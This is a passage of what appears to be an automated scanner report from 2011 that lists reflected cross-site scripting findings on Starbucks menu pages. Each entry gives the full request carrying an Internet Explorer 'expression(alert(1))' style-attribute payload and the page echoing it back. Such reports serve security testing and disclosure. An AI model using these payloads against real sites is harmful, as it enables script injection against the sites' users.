This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-toffee-mocha?29fbd"style%3d"x%3aexpression(alert(1))"1ea5a8b090d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:22 GMT
Connection: close
Content-Length: 43039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha?29fbd"style="x:expression(alert(1))"1ea5a8b090d=1"/>
...[SNIP]...

1.742. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee016"style%3d"x%3aexpression(alert(1))"f40cbb757bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee016"style="x:expression(alert(1))"f40cbb757bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/iced-white-chocolate-mocha?ee016"style%3d"x%3aexpression(alert(1))"f40cbb757bf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:11 GMT
Connection: close
Content-Length: 43213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha?ee016"style="x:expression(alert(1))"f40cbb757bf=1"/>
...[SNIP]...

1.743. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64dcf"style%3d"x%3aexpression(alert(1))"6458be98685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64dcf"style="x:expression(alert(1))"6458be98685 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/peppermint-mocha?64dcf"style%3d"x%3aexpression(alert(1))"6458be98685=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:17 GMT
Connection: close
Content-Length: 43641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha?64dcf"style="x:expression(alert(1))"6458be98685=1"/>
...[SNIP]...

1.744. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/peppermint-white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7efd8"style%3d"x%3aexpression(alert(1))"53305b3ac5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7efd8"style="x:expression(alert(1))"53305b3ac5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/peppermint-white-chocolate-mocha?7efd8"style%3d"x%3aexpression(alert(1))"53305b3ac5e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:26 GMT
Connection: close
Content-Length: 43432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha?7efd8"style="x:expression(alert(1))"53305b3ac5e=1"/>
...[SNIP]...

1.745. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/pumpkin-spice-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f2e"style%3d"x%3aexpression(alert(1))"93a50fd3873 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4f2e"style="x:expression(alert(1))"93a50fd3873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/pumpkin-spice-latte?b4f2e"style%3d"x%3aexpression(alert(1))"93a50fd3873=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:49 GMT
Connection: close
Content-Length: 43720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte?b4f2e"style="x:expression(alert(1))"93a50fd3873=1"/>
...[SNIP]...

1.746. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5878"style%3d"x%3aexpression(alert(1))"e44d0e07167 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5878"style="x:expression(alert(1))"e44d0e07167 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-caramel-macchiato?d5878"style%3d"x%3aexpression(alert(1))"e44d0e07167=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:05 GMT
Connection: close
Content-Length: 43234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato?d5878"style="x:expression(alert(1))"e44d0e07167=1"/>
...[SNIP]...

1.747. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c121"style%3d"x%3aexpression(alert(1))"3bc6692e203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c121"style="x:expression(alert(1))"3bc6692e203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-cinnamon-dolce-latte?8c121"style%3d"x%3aexpression(alert(1))"3bc6692e203=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:18 GMT
Connection: close
Content-Length: 43735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte?8c121"style="x:expression(alert(1))"3bc6692e203=1"/>
...[SNIP]...

1.748. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/skinny-flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f1f"style%3d"x%3aexpression(alert(1))"645f16f209c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1f1f"style="x:expression(alert(1))"645f16f209c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/skinny-flavored-latte?c1f1f"style%3d"x%3aexpression(alert(1))"645f16f209c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:04 GMT
Connection: close
Content-Length: 43440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte?c1f1f"style="x:expression(alert(1))"645f16f209c=1"/>
...[SNIP]...

1.749. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/toffee-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec4e2"style%3d"x%3aexpression(alert(1))"d6a9d7dfee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec4e2"style="x:expression(alert(1))"d6a9d7dfee8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/toffee-mocha?ec4e2"style%3d"x%3aexpression(alert(1))"d6a9d7dfee8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:13 GMT
Connection: close
Content-Length: 42936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/toffee-mocha?ec4e2"style="x:expression(alert(1))"d6a9d7dfee8=1"/>
...[SNIP]...

1.750. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/white-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b4a"style%3d"x%3aexpression(alert(1))"ce231ac2d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91b4a"style="x:expression(alert(1))"ce231ac2d92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/white-chocolate-mocha?91b4a"style%3d"x%3aexpression(alert(1))"ce231ac2d92=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:03 GMT
Connection: close
Content-Length: 43180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha?91b4a"style="x:expression(alert(1))"ce231ac2d92=1"/>
...[SNIP]...

1.751. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccae7"style%3d"x%3aexpression(alert(1))"533387bf426 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccae7"style="x:expression(alert(1))"533387bf426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages?ccae7"style%3d"x%3aexpression(alert(1))"533387bf426=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:00 GMT
Connection: close
Content-Length: 52502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?ccae7"style="x:expression(alert(1))"533387bf426=1"/>
...[SNIP]...

1.752. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff8"style%3d"x%3aexpression(alert(1))"8e1c5ef3e74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3eff8"style="x:expression(alert(1))"8e1c5ef3e74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee?3eff8"style%3d"x%3aexpression(alert(1))"8e1c5ef3e74=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:00 GMT
Connection: close
Content-Length: 45428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee?3eff8"style="x:expression(alert(1))"8e1c5ef3e74=1"/>
...[SNIP]...

1.753. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfdb4"style%3d"x%3aexpression(alert(1))"f631b1836 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfdb4"style="x:expression(alert(1))"f631b1836 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee?bfdb4"style%3d"x%3aexpression(alert(1))"f631b1836=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:06 GMT
Connection: close
Content-Length: 44981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee?bfdb4"style="x:expression(alert(1))"f631b1836=1"/>
...[SNIP]...

1.754. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dba1"style%3d"x%3aexpression(alert(1))"e2d7ccafcf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3dba1"style="x:expression(alert(1))"e2d7ccafcf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage?3dba1"style%3d"x%3aexpression(alert(1))"e2d7ccafcf6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:12 GMT
Connection: close
Content-Length: 43470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage?3dba1"style="x:expression(alert(1))"e2d7ccafcf6=1"/>
...[SNIP]...

1.755. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
